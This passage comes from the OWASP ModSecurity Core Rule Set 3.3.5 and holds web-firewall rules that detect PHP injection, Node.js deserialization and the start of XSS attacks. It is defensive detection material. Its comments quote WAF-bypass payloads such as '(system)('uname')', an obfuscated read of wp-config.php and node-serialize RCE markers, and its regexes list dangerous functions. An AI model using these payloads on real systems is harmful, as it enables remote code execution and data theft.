(?:ash(?:_(?:update|hmac))?|ighlight)_file|e(?:ader_register_callback|x2bin))|f(?:i(?:le(?:(?:[acm]tim|inod)e|(?:_exist|perm)s|group)?|nfo_open)|tp_(?:nb_(?:ge|pu)|connec|ge|pu)t|(?:unction_exis|pu)ts|write|open)|o(?:b_(?:get_(?:c(?:ontents|lean)|flush)|end_(?:clean|flush)|clean|flush|start)|dbc_(?:result(?:_all)?|exec(?:ute)?|connect)|pendir)|m(?:b_(?:ereg(?:_(?:replace(?:_callback)?|match)|i(?:_replace)?)?|parse_str)|(?:ove_uploaded|d5)_file|ethod_exists|ysql_query|kdir)|e(?:x(?:if_(?:t(?:humbnail|agname)|imagetype|read_data)|ec)|scapeshell(?:arg|cmd)|rror_reporting|val)|c(?:url_(?:file_create|exec|init)|onvert_uuencode|reate_function|hr)|u(?:n(?:serialize|pack)|rl(?:de|en)code|[ak]?sort)|(?:json_(?:de|en)cod|debug_backtrac|tmpfil)e|b(?:(?:son_(?:de|en)|ase64_en)code|zopen)|var_dump)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \
    "id:933160,\
    phase:2,\
    block,\
    capture,\
    t:none,\
    msg:'PHP Injection Attack: High-Risk PHP Function Call Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-php',\
    tag:'platform-multi',\
    tag:'attack-injection-php',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"


#
# [ PHP Object Injection ]
#
# PHP Object Injection is an application level vulnerability that could allow
# an attacker to perform different kinds of malicious attacks, such as
# Code Injection, SQL Injection, Path Traversal and Application Denial of Service,
# depending on the context.
#
# The vulnerability occurs when user-supplied input is not properly sanitized
# before being passed to the unserialize() PHP function. Since PHP allows object
# serialization, attackers could pass ad-hoc serialized strings to a vulnerable
# unserialize() call, resulting in an arbitrary PHP object(s) injection into the
# application scope.
# # https://www.owasp.org/index.php/PHP_Object_Injection # # In serialized form, PHP objects have the following format: # # O:8:"stdClass":1:{s:1:"a";i:2;} # O:3:"Foo":0:{} # # Also detected are PHP objects with a custom unserializer: # http://www.phpinternalsbook.com/classes_objects/serialization.html # These have the following format: # # C:11:"ArrayObject":37:{x:i:0;a:1:{s:1:"a";s:1:"b";};m:a:0:{}} # C:3:"Foo":23:{s:15:"My private data";} # # HTTP headers are inspected, since PHP object injection vulnerabilities have been # found in applications parsing them: # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562 (User-Agent header) # https://www.exploit-db.com/exploits/39033/ (X-Forwarded-For header) # http://karmainsecurity.com/KIS-2015-10 (Host header) # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XML:/* "@rx [oOcC]:\d+:\".+?\":\d+:{.*}" \ "id:933170,\ phase:2,\ block,\ capture,\ t:none,\ msg:'PHP Injection Attack: Serialized Object Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [ PHP Functions: Variable Function Calls ] # # PHP 'variable functions' provide an alternate syntax for calling PHP functions. # http://php.net/manual/en/functions.variable-functions.php # # An attacker may use variable function syntax to evade detection of function # names during exploitation of a remote code execution vulnerability. # An example to use the 'file_get_contents' function while evading rule 933150: # # $fn = 'file_' . 'get_' . 'contents'; # echo $fn('wp-co' . 
'nfig.php'); # # Some examples from obfuscated malware: # # $OOO0000O0(...) # @$b374k(...) # $_[@-_]($_[@!+_] ) # # A breakdown of the regular expression: # # \$+ # The variable's '$' char, or multiple '$' for 'variable variables': # http://php.net/manual/en/language.variables.variable.php # (?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+}) # One of the following: # - A variable name; regexp from http://php.net/language.variables.basics # - A nonempty expression for variable variables: ${'fn'} or $ {'fn'} # (?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)* # Optional whitespace, array access, or comments # \(.*\) # Parentheses optionally containing function parameters # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx \$+(?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+})(?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)*\(.*\)" \ "id:933180,\ phase:2,\ block,\ capture,\ t:none,\ msg:'PHP Injection Attack: Variable Function Call Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ PHP Functions: Variable Function Prevent Bypass ] # # Referring to https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/ # the rule 933180 could be bypassed by using the following payloads: # # - (system)('uname') # - (sy.(st).em)('uname') # - (string)"system"('uname') # - define('x', 'sys' . 
#   'tem');(x)/* comment */('uname')
# - $y = 'sys'.'tem';($y)('uname')
# - define('z', [['sys' .'tem']]);(z)[0][0]('uname');
# - (system)(ls)
# - (/**/system)(ls/**/);
# - (['system'])[0]('uname');
# - (++[++system++][++0++])++{/*dsasd*/0}++(++ls++);
#
# This rule blocks all payloads above and avoids blocking values like:
#
# - [ACME] this is a test (just a test)
# - Test (with two) rounded (brackets)
#
# Rule 933210 at a glance (paranoia level 1, phase 2):
# - Pattern, first alternative: a '(...)' or '[...]' group made only of
#   letters, digits and the characters _ . $ " ' [ ] ( ) { } / * and
#   whitespace, optionally followed by more of those characters (digits but
#   no letters), then a parenthesised argument list.
# - Pattern, second alternative: a '(string)' cast, with optional whitespace,
#   followed by a single or double quote.
# - Transformations: t:urlDecode, t:replaceComments and t:compressWhitespace
#   run before matching, so URL-encoded input, comment-padded input and
#   input padded with repeated whitespace are normalised first.
# - On match: 'block' (the disruptive action is the one configured through
#   SecDefaultAction) and the critical anomaly score is added to
#   tx.php_injection_score and tx.anomaly_score_pl1.
# - Log triage: the msg text is identical to that of rule 933180; tell the
#   two apart by rule id.
# - The two benign examples above are the only false-positive cases this
#   comment documents; free text with bracketed or parenthesised phrases is
#   the input class to watch when tuning.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:\(|\[)[a-zA-Z0-9_.$\"'\[\](){}/*\s]+(?:\)|\])[0-9_.$\"'\[\](){}/*\s]*\([a-zA-Z0-9_.$\"'\[\](){}/*\s].*\)|\([\s]*string[\s]*\)[\s]*(?:\"|'))" \
    "id:933210,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecode,t:replaceComments,t:compressWhitespace,\
    msg:'PHP Injection Attack: Variable Function Call Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-php',\
    tag:'platform-multi',\
    tag:'attack-injection-php',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"


# Paranoia-level gate: when the executing paranoia level is below 2, jump to
# the END-REQUEST-933-APPLICATION-ATTACK-PHP marker so that none of the rules
# below run. There is one gate rule for phase 1 and one for phase 2; both
# use 'pass,nolog', so the gate itself neither blocks nor logs.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#

#
# [ PHP Functions: Medium-Risk PHP Function Names ]
#
# In paranoia level 2, we add additional checks for most PHP functions.
#
# The size of the PHP function list is considerable.
# Even after excluding the more obscure PHP extensions, 1300+ functions remain.
# For performance and maintenance reasons, this rule does not use a regexp,
# but uses a phrase file (@pmFromFile), and additionally looks for an '(' character
# in the matched variable.
#
# This approach carries some risk for false positives. Therefore, the function list
# has been curated to remove words closely matching natural language and terms often
# used in other contexts.
#
# This rule is a stricter sibling of rule 933150.
#
# Rule 933151 at a glance (paranoia level 2, phase 2):
# - It is a two-rule chain. The first rule looks up phrases from
#   php-function-names-933151.data in the lowercased input (t:lowercase);
#   the chained rule then requires a '(' in MATCHED_VARS.
# - The anomaly-score setvar actions and ctl:auditLogParts are placed on the
#   chained rule, i.e. they belong to the part of the chain that is only
#   reached after the phrase match.
# - On a full match the critical anomaly score is added to
#   tx.php_injection_score and tx.anomaly_score_pl2.
# - Deployment: the phrase file must be shipped together with this rule
#   file. NOTE(review): a relative @pmFromFile path is expected to resolve
#   against the directory of the rule file - confirm for the engine in use.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933151.data" \
    "id:933151,\
    phase:2,\
    block,\
    capture,\
    t:none,t:lowercase,\
    msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-php',\
    tag:'platform-multi',\
    tag:'attack-injection-php',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    tag:'paranoia-level/2',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    chain"
    SecRule MATCHED_VARS "@pm (" \
        "capture,\
        ctl:auditLogParts=+E,\
        setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
        setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"


# Paranoia-level gate: when the executing paranoia level is below 3, jump to
# the END-REQUEST-933-APPLICATION-ATTACK-PHP marker so that none of the rules
# below run. There is one gate rule for phase 1 and one for phase 2; both
# use 'pass,nolog', so the gate itself neither blocks nor logs.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#

#
# [ PHP Variables: Common Variable Indexes ]
#
# In paranoia level 3, we add additional checks for parameters to many PHP variables.
#
#
# One of the more common variables used within attacks on PHP is $_SERVER. Because
# of how many different ways PHP has for executing variables (variable variables,
# etc) often just looking for $_SERVER will be less effective than looking for the
# various indexes within $_SERVER.
# This rule checks for these indexes.
# This rule is located in PL 3 because often developers will use these names as
# parameter names or values and this will lead to false positives.
# Because this list is not expected to change and it is limited in size we use a
# regex in this case to look for these values whereas in its sibling rule we use
# @pmFromFile for flexibility and performance.
#
# To rebuild the regexp:
#   cd util/regexp-assemble
#   ./regexp-assemble.pl < regexp-933131.data
#
# This rule is a stricter sibling of rule 933130.
#
# Rule 933131 at a glance (paranoia level 3, phase 2):
# - Pattern: the index names HTTP_ACCEPT (optionally with _ENCODING,
#   _LANGUAGE or _CHARSET), HTTP_X_FORWARDED_FOR, HTTP_REFERER,
#   HTTP_USER_AGENT, HTTP_HOST, HTTP_CONNECTION, HTTP_KEEP_ALIVE,
#   PATH_TRANSLATED, PATH_INFO, ORIG_PATH_INFO, QUERY_STRING, REQUEST_URI
#   and AUTH_TYPE. The pattern carries no (?i) flag and the rule has no
#   t:lowercase, so the names are matched as written, in upper case.
# - Targets: cookies (except names matching /__utm/), cookie names, argument
#   names, argument values and XML content.
# - Transformations: t:normalisePath, then t:urlDecodeUni.
# - On match: 'block' (the disruptive action is the one configured through
#   SecDefaultAction) and the critical anomaly score is added to
#   tx.php_injection_score and tx.anomaly_score_pl3.
# - Tuning: applications that legitimately use these names as parameter
#   names or values (the false-positive case described above) are better
#   served by a target exclusion for this rule id than by lowering the
#   paranoia level for the whole site.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:HTTP_(?:ACCEPT(?:_(?:ENCODING|LANGUAGE|CHARSET))?|(?:X_FORWARDED_FO|REFERE)R|(?:USER_AGEN|HOS)T|CONNECTION|KEEP_ALIVE)|PATH_(?:TRANSLATED|INFO)|ORIG_PATH_INFO|QUERY_STRING|REQUEST_URI|AUTH_TYPE)" \
    "id:933131,\
    phase:2,\
    block,\
    capture,\
    t:none,t:normalisePath,t:urlDecodeUni,\
    msg:'PHP Injection Attack: Variables Found',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-php',\
    tag:'platform-multi',\
    tag:'attack-injection-php',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    tag:'paranoia-level/3',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"

#
# [ PHP Functions: Low-Value PHP Function Calls ]
#
# In paranoia level 3, we add additional checks for the remaining PHP functions.
#
# Most of these function names are likely to cause false positives in natural text
# or common parameter values, such as 'abs', 'copy', 'date', 'key', 'max', 'min'.
# Therefore, these function names are not scanned in lower paranoia levels.
#
# To mitigate the risk of false positives somewhat, a regexp is used to look for
# PHP function syntax. (See rule 933160 for a description.)
#
# This rule is a stricter sibling of rule 933160.
# # This rule is also triggered by the following exploit(s): # [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45262 ] # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # # Regexp generated from util/regexp-assemble/regexp-933161.data using Regexp::Assemble. # See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. # # Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble # output. Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:i(?:s(?:_(?:in(?:t(?:eger)?|finite)|n(?:u(?:meric|ll)|an)|(?:calla|dou)ble|s(?:calar|tring)|f(?:inite|loat)|re(?:source|al)|l(?:ink|ong)|a(?:rray)?|object|bool)|set)|n(?:(?:clud|vok)e|t(?:div|val))|(?:mplod|dat)e|conv)|s(?:t(?:r(?:(?:le|sp)n|coll)|at)|(?:e(?:rializ|ttyp)|huffl)e|i(?:milar_text|zeof|nh?)|p(?:liti?|rintf)|(?:candi|ubst)r|y(?:mlink|slog)|o(?:undex|rt)|leep|rand|qrt)|f(?:ile(?:(?:siz|typ)e|owner|pro)|l(?:o(?:atval|ck|or)|ush)|(?:rea|mo)d|t(?:ell|ok)|unction|close|gets|stat|eof)|c(?:h(?:o(?:wn|p)|eckdate|root|dir|mod)|o(?:(?:(?:nsta|u)n|mpac)t|sh?|py)|lose(?:dir|log)|(?:urren|ryp)t|eil)|e(?:x(?:(?:trac|i)t|p(?:lode)?)|a(?:ster_da(?:te|ys)|ch)|r(?:ror_log|egi?)|mpty|cho|nd)|l(?:o(?:g(?:1[0p])?|caltime)|i(?:nk(?:info)?|st)|(?:cfirs|sta)t|evenshtein|trim)|d(?:i(?:(?:skfreespac)?e|r(?:name)?)|e(?:fined?|coct)|(?:oubleva)?l|ate)|r(?:e(?:(?:quir|cod|nam)e|adlin[ek]|wind|set)|an(?:ge|d)|ound|sort|trim)|m(?:b(?:split|ereg)|i(?:crotime|n)|a(?:i[ln]|x)|etaphone|y?sql|hash)|u(?:n(?:(?:tain|se)t|iqid|link)|s(?:leep|ort)|cfirst|mask)|a(?:s(?:(?:se|o)rt|inh?)|r(?:sort|ray)|tan[2h]?|cosh?|bs)|t(?:e(?:xtdomain|mpnam)|a(?:int|nh?)|ouch|ime|rim)|h(?:e(?:ader(?:s_(?:lis|sen)t)?|brev)|ypot|ash)|p(?:a(?:thinfo|ck)|r(?:intf?|ev)|close|o
[sw]|i)|g(?:et(?:t(?:ext|ype)|date)|mdate)|o(?:penlog|ctdec|rd)|b(?:asename|indec)|n(?:atsor|ex)t|k(?:sort|ey)|quotemeta|wordwrap|virtual|join)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \ "id:933161,\ phase:2,\ block,\ capture,\ t:none,\ msg:'PHP Injection Attack: Low-Value PHP Function Call Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # # [ PHP Script Uploads: Superfluous extension ] # # Block file uploads with PHP related extensions (.php, .phps, .phtml, # .php5 etc) anywhere in the name, followed by a dot. # # Example: index.php.tmp # # Uploading of such files can lead to remote code execution if # Apache is configured with AddType and MultiViews, as Apache will # automatically do a filename match when the extension is unknown. # This configuration is fortunately not common in modern installs. # # Blocking these file names might lead to more false positives. # # Some AJAX uploaders use the nonstandard request headers X-Filename, # X_Filename, or X-File-Name to transmit the file name to the server; # scan these request headers as well as multipart/form-data file names. # # This rule is a stricter sibling of rule 933110. 
# SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\..*$" \ "id:933111,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'PHP Injection Attack: PHP Script File Upload Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # [ PHP Closing Tag Found ] # # http://www.php.net/manual/en/language.basic-syntax.phptags.php # # This check was extracted from 933100 (paranoia level 1), since the # checked sequence '?>' commonly causes false positives. # See issue #654 for discussion. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm ?>" \ "id:933190,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,\ msg:'PHP Injection Attack: PHP Closing Tag Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or 
higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-933-APPLICATION-ATTACK-PHP" modsecurity-crs-3.3.5/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf000066400000000000000000000076351446122515100240260ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # [ Insecure unserialization / generic RCE signatures ] # # Libraries performing insecure unserialization: # - node-serialize: _$$ND_FUNC$$_ (CVE-2017-5941) # - funcster: __js_function # # See: # https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ # https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/ # # Some generic snippets used: # - function() { # - new Function( # - eval( # - String.fromCharCode( # # Last two are used by nodejsshell.py, # https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py # # As base64 is sometimes (but not always) used to encode serialized values, # use multiMatch and t:base64decode. 
# # Regexp generated from util/regexp-assemble/regexp-934100.data using Regexp::Assemble. # See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:_(?:\$\$ND_FUNC\$\$_|_js_function)|(?:new\s+Function|\beval)\s*\(|String\s*\.\s*fromCharCode|function\s*\(\s*\)\s*{|this\.constructor)|module\.exports\s*=)" \ "id:934100,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:base64Decode,\ msg:'Node.js Injection Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-javascript',\ tag:'platform-multi',\ tag:'attack-rce',\ tag:'attack-injection-nodejs',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" 
"id:934018,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-934-APPLICATION-ATTACK-NODEJS" modsecurity-crs-3.3.5/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf000066400000000000000000001170241446122515100235110ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # -=[ Libinjection - XSS Detection ]=- # # Ref: https://github.com/client9/libinjection # Ref: https://speakerdeck.com/ngalbreath/libinjection-from-sqli-to-xss # # -=[ Targets ]=- # # 941100: PL1 : REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/| # REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent| # ARGS_NAMES|ARGS|XML:/* # # 941101: PL2 : REQUEST_HEADERS:Referer # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@detectXSS" \ "id:941100,\ phase:2,\ block,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'XSS Attack 
Detected via libinjection',\ logdata:'Matched Data: XSS data found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ XSS Filters - Category 1 ]=- # http://xssplayground.net23.net/xssfilter.html # script tag based XSS vectors, e.g., # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*>[\s\S]*?" \ "id:941110,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'XSS Filter - Category 1: Script Tag Vector',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ XSS Filters - Category 2 ]=- # XSS vectors making use of event handlers like onerror, onload etc, e.g., # SecRule 